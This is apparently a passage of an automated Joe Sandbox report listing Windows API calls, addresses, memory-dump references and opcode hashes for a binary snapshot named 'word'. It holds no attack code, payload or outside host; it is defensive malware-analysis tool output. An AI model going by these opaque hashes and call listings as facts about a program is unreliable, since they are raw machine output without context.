                                                                    • GetPrivateProfileSectionW.KERNEL32 ref: 0045C2F4
                                                                    • GetPrivateProfileSectionW.KERNEL32 ref: 0045C31B
                                                                    • WritePrivateProfileSectionW.KERNEL32 ref: 0045C363
                                                                    • WritePrivateProfileStringW.KERNEL32 ref: 0045C385
                                                                    • WritePrivateProfileStringW.KERNEL32 ref: 0045C392
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                    • String ID:
                                                                    • API String ID: 2832842796-0
                                                                    • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                    • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                    • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                    • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                    • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                    • EndPaint.USER32(?,?), ref: 00447CD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                    • String ID:
                                                                    • API String ID: 659298297-0
                                                                    • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                    • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                    • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                    • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                    APIs
                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                    • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                    • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                      • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                      • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(0031E158,000000F1,00000000,00000000), ref: 004414C6
                                                                      • Part of subcall function 004413F0: SendMessageW.USER32(0031E158,000000F1,00000001,00000000), ref: 004414F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableMessageSend$LongShow
                                                                    • String ID:
                                                                    • API String ID: 142311417-0
                                                                    • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                    • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                    • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                    • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0044955A
                                                                      • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                    • _wcslen.LIBCMT ref: 004495C1
                                                                    • _wcslen.LIBCMT ref: 004495CE
                                                                    • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                    • String ID:
                                                                    • API String ID: 1843234404-0
                                                                    • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                    • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                    • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                    • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                    • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                    • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                    • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00445721
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                    • _wcslen.LIBCMT ref: 004457A3
                                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3087257052-0
                                                                    • Opcode ID: 0f69288367976b034a12f7588e712918c24dc6ccb97919dc3b68026f74ba36d3
                                                                    • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                    • Opcode Fuzzy Hash: 0f69288367976b034a12f7588e712918c24dc6ccb97919dc3b68026f74ba36d3
                                                                    • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00459DEF
                                                                    • GetForegroundWindow.USER32 ref: 00459E07
                                                                    • GetDC.USER32(00000000), ref: 00459E44
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                    • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                    • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                    • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                    APIs
                                                                      • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                    • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                    • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                    • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 245547762-0
                                                                    • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                    • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                    • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                    • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00447151
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                    • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                    • BeginPath.GDI32(?), ref: 004471B7
                                                                    • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                                    • String ID:
                                                                    • API String ID: 2338827641-0
                                                                    • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                    • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                    • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                    • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                    • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                    • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                    • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                    APIs
                                                                    • SendMessageW.USER32 ref: 0046FD00
                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                    • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                    • DestroyIcon.USER32(?), ref: 0046FD58
                                                                    • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyIcon
                                                                    • String ID:
                                                                    • API String ID: 3419509030-0
                                                                    • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                    • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                    • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                    • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                                    • String ID:
                                                                    • API String ID: 4023252218-0
                                                                    • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                    • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                    • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                    • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                    • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                    • MessageBeep.USER32(00000000), ref: 0046036D
                                                                    • KillTimer.USER32 ref: 00460392
                                                                    • EndDialog.USER32 ref: 004603AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                    • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                    • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                    • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                    • DestroyWindow.USER32 ref: 00455678
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                    • String ID:
                                                                    • API String ID: 1489400265-0
                                                                    • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                    • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                    • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                    • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                    APIs
                                                                      • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                    • DestroyWindow.USER32 ref: 00455640
                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                    • DestroyWindow.USER32 ref: 00455678
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 1042038666-0
                                                                    • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                    • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                    • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                    • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                    • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                    • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                    • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                    APIs
                                                                      • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                    • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                    • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                    • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                    • ExitThread.KERNEL32 ref: 0041410F
                                                                    • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00414115
                                                                    • __freefls@4.LIBCMT ref: 00414135
